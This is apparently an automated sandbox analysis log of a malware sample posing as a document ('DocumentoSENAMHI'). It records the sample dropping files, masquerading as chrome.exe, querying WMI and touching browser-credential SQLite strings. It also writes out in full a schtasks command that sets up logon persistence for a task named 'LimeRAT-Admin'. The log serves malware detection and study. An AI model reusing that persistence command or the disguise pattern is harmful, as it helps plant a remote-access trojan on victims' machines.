Source: 15.0.wtqsCpda..exe.540000.0.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 19.0.chrome.exe.a20000.3.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 19.0.chrome.exe.a20000.3.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 15.0.wtqsCpda..exe.540000.3.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 15.0.wtqsCpda..exe.540000.3.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 19.0.chrome.exe.a20000.0.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 19.0.chrome.exe.a20000.0.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: wtqsCpda..exe.1.dr, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: wtqsCpda..exe.1.dr, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD1B39 LoadLibraryExA,LoadLibraryExA,FindResourceA,LoadResource,SizeofResource,FreeLibrary, 1_2_00BD1B39
Source: DocumentoSENAMHI20222103.exe ReversingLabs: Detection: 16%
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe "C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe"
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Process created: C:\Users\user\AppData\Roaming\wtqsCpda..exe "C:\Users\user\AppData\Roaming\wtqsCpda..exe"
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\user\AppData\Local\Temp\chrome.exe'"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\chrome.exe C:\Users\user\AppData\Local\Temp\chrome.exe
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process created: C:\Users\user\AppData\Local\Temp\chrome.exe "C:\Users\user\AppData\Local\Temp\chrome.exe"
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\user\AppData\Local\Temp\chrome.exe'"
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process created: C:\Users\user\AppData\Local\Temp\chrome.exe "C:\Users\user\AppData\Local\Temp\chrome.exe"
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe File created: C:\Users\user\AppData\Local\Temp\chrome.exe
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD14A2 CoCreateInstance, 1_2_00BD14A2
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
